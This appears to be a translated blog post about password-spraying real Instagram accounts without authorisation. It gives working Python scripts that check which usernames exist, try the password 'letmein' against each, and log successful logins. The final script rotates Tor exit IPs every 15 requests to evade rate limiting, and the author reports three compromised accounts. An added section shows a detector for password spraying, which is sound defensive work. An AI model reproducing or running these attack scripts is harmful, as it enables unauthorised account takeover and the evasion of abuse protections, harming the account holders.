
How I took a little Instagram



It all started after I read an article about the most popular passwords of 2013. Like many people, I suspect, I immediately wanted to check whether these passwords really are that popular. After some deliberation, I settled on the social network and photo-sharing service Instagram.


The first steps


The first thing I did was check how the web version responds to a login with a correct and an incorrect password. Everything turned out to be standard, which even pleased me a little. If the password is incorrect, the server answers with code 200; if it is correct, code 302 comes back and redirects to the main page. That was enough, so I started writing a Python script that would submit the username and password to the form and then find out whether they worked.
It looked like this:

    import urllib

    login_data = urllib.urlencode({'username': 'username', 'password': 'password', 'submit': 'Login'})
    response = urllib.urlopen('https://instagram.com/accounts/login/', login_data)
    f = open('dex.html', 'w')
    f.write(response.read())
    f.close()
    print 'ok'



The first test gave the error "Enable cookies" ("This page could not be loaded. If you have cookies, please click on it."). I didn't have much time, so I chose a quick solution that I usually use for testing my own creations, namely mechanize. More precisely, mechanize.Browser().

The second version looked like this:

    import mechanize

    name = 'username'
    password = 'password'
    br = mechanize.Browser()
    br.open('https://instagram.com/accounts/login/')
    br.select_form(nr = 0)
    br.form['username'] = name
    br.form['password'] = password
    br.submit()
    f = open('dex.html','w')
    f.write(br.response().read())
    f.close()
    print 'ok'



Temporary success


And, lo and behold! With both a valid and an invalid login/password pair, everything worked as needed. But the server response code in both situations was 200. This is not a problem, because the response contains the page that came back. It is enough to look for any phrase on the page saying that the password did not fit. If it is absent, then all is well: we have found a user with a weak password.

It looked like this to me:

    if br.response().read().find('correct username') == -1:
        print 'YEP'
        log_list = open('log_list.txt','ab+')
        log_list.write(name + ' ' + password + '\n')
        log_list.close()
    else:
        print 'NOPE'


So far everything was going smoothly. I never found the Sitemap, so I plugged in the standard English word dictionary from Ubuntu (/usr/share/dict/american-english), from which I took all the words without an apostrophe, and the password list was reduced, under the conditions of the experiment, to the list from the above-mentioned article. But out of that whole list, a manual check revealed only one password the service accepts (Instagram does not allow its users to choose passwords that are too simple). It became less interesting, but I did not want to stop. Along the way, I added a check for whether a user with a given login even exists, so as not to send requests in vain and to count only existing users in the statistics. This is an experiment, after all!

All together it already looked like this:

    import httplib
    import mechanize
    from urlparse import urlparse

    def check_url(url):
        p = urlparse(url)
        conn = httplib.HTTPConnection(p.netloc)
        conn.request('HEAD', p.path)
        resp = conn.getresponse()
        return resp.status < 400

    names = open('american-english','r').read().split('\n')
    password = 'letmein'
    number = 0
    for name in names:
        if name.find("'") == -1:
            number += 1
            url = 'https://instagram.com/'+name
            if check_url(url):
                print 'not exist'
            else:
                print str(number) + ' ' + name
                br = mechanize.Browser()
                br.open('https://instagram.com/accounts/login/')
                br.select_form(nr = 0)
                br.form['username'] = name
                br.form['password'] = password
                br.submit()
                s = br.response().read().find('correct username')
                if s == -1:
                    print 'YEP'
                    log_list = open('log_list.txt','ab+')
                    log_list.write(name + ' ' + password + '\n')
                    log_list.close()
                else:
                    print 'NOPE'



Not the most reliable protection against brute force


After 20 iterations, Instagram began rejecting me with a 403 Forbidden error (access denied). Their server had guessed that I was doing something bad. I tried playing with different cookies and browser substitutions. No luck, it still did not let me in, so they ban by IP. A proxy is needed. The fastest solution for anonymous access I found was Tor. By trial and error, it was determined that a change of IP is required approximately after every 15 requests. The machine was up and running!

Final script:

    import os, socks, socket, mechanize, cookielib, httplib
    from urlparse import urlparse

    def check_url(url):
        p = urlparse(url)
        conn = httplib.HTTPConnection(p.netloc)
        conn.request('HEAD', p.path)
        resp = conn.getresponse()
        return resp.status < 400

    def create_connection(address, timeout=None, source_address=None):
        sock = socks.socksocket()
        sock.connect(address)
        return sock

    socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, "127.0.0.1", 9050)
    socket.socket = socks.socksocket
    socket.create_connection = create_connection

    names = open('american-english','r').read().split('\n')
    password = 'letmein'
    number = 0
    for name in names:
        if name.find("'") == -1:
            if number%15 == 0:
                os.system('service tor restart')
            number += 1
            url = 'https://instagram.com/'+name
            if check_url(url):
                print 'not exist'
            else:
                try:
                    print str(number) + ' ' + name
                    br = mechanize.Browser()
                    br.set_handle_equiv(True)
                    br.set_handle_redirect(True)
                    br.set_handle_robots(False)
                    br.open('https://instagram.com/accounts/login/')
                    br.select_form(nr = 0)
                    br.form['username'] = name
                    br.form['password'] = password
                    br.submit()
                    if br.response().read().find('correct username') == -1:
                        print 'YEP'
                        log_list = open('log_list.txt','ab+')
                        log_list.write(name + ' ' + password + '\n')
                        log_list.close()
                    else:
                        print 'NOPE'
                except:
                    print 'something wrong'
                    pass



I left it to work overnight.
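Seen from the defending side, the per-IP limit described above never fires when the source address changes every 15 requests, yet one password failing against many accounts remains visible. The following is an added example, not code from the original post: it replays constructed login events through a per-IP counter and through a detector keyed on an HMAC fingerprint of the failed password. `SPRAY_LIMIT`, `WINDOW`, `KEY` and every event value are assumptions made for the illustration.

```python
import hashlib
import hmac
from collections import defaultdict

PER_IP_LIMIT = 20                 # the post saw 403 after about 20 requests from one IP
SPRAY_LIMIT = 10                  # assumed: accounts one failed password may hit per window
WINDOW = 3600                     # assumed window, in seconds
KEY = b"constructed-demo-key"     # placeholder for a server-side secret

def fingerprint(password):
    """Keyed, truncated hash so the event log never holds the attempted password."""
    return hmac.new(KEY, password.encode(), hashlib.sha256).hexdigest()[:16]

def build_events():
    """Constructed sample events: (ts, src_ip, username, password_fp, success)."""
    events = []
    for i in range(60):           # one password over many names, new IP every 15 tries
        ip = "198.51.100.%d" % (i // 15 + 1)
        events.append((i * 5, ip, "word%03d" % i, fingerprint("letmein"), False))
    for i in range(5):            # ordinary users mistyping their own passwords
        events.append((i * 40, "203.0.113.7", "staff%d" % i, fingerprint("typo%d" % i), False))
    return sorted(events)

def per_ip_blocked(events, limit=PER_IP_LIMIT):
    """Source IPs that reach the per-IP request limit inside the window."""
    hits, blocked = defaultdict(list), set()
    for ts, ip, _user, _fp, _ok in events:
        hits[ip] = [t for t in hits[ip] if ts - t < WINDOW] + [ts]
        if len(hits[ip]) >= limit:
            blocked.add(ip)
    return blocked

def sprayed_fingerprints(events, limit=SPRAY_LIMIT):
    """Password fingerprints that failed against `limit` or more distinct accounts."""
    seen, flagged = defaultdict(dict), set()   # seen: fp -> {username: last_ts}
    for ts, _ip, user, fp, ok in events:
        if ok:
            continue
        seen[fp][user] = ts
        seen[fp] = {u: t for u, t in seen[fp].items() if ts - t < WINDOW}
        if len(seen[fp]) >= limit:
            flagged.add(fp)
    return flagged

if __name__ == "__main__":
    ev = build_events()
    print("blocked by per-IP limit:", per_ip_blocked(ev))
    print("flagged as sprayed:", sprayed_fingerprints(ev))
```

On the constructed events the per-IP counter blocks nothing, while the fingerprint counter flags the single sprayed password regardless of how many addresses it arrived from.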

About the results.


In the morning I woke up as if on New Year's morning, anticipating what gift my hardworking elf had left me. In total, 9103 names were checked (far from the whole list; I stopped the script), and three of them used a vulnerable password. This is about 0.03% of respondents, which is not so little. I would have been glad if there had been even one. I contacted the account holders and asked them to change their passwords. Now there are 3 fewer people in the world using weak passwords to protect their favorite photos.

Thank you all for your attention.

Source: https://habr.com/ru/post/215829/

